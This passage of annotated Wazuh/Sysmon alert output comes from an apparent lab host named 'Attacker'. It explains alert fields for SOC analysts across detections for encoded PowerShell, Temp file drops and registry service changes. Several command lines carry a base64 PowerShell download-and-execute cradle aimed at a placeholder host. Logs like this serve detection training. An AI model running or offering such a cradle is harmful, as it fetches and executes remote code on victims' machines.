No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\system32\\cmd.exe\" /Q /C \"\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\uninstall.cmd\" --dir=\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc07-680a-f709-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8992
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe\" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.749+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.749+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.751824
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:13.6930233Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280095
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:12.668 ProcessGuid: {94294ddc-bc28-680a-220a-000000000e00} ProcessId: 11012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00} ParentProcessId: 13852 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:12.668
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc28-680a-220a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc25-680a-1d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.957+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.957+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.759894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:19.6224934Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280237
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:19.616 ProcessGuid: {94294ddc-bc2b-680a-270a-000000000e00} ProcessId: 15028 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5klyxkyf.pry.ps1 CreationUtcTime: 2025-04-24 22:33:19.615 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:19.616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc2b-680a-270a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5klyxkyf.pry.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:19.615
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.086+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.086+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.762662
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:22.7768023Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280333
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-24 22:33:22.771 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:22.771
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.118+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.766890
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:22.8414954Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280341
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-24 22:33:22.836 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.115\elevation_service.exe" User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:22.836
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath
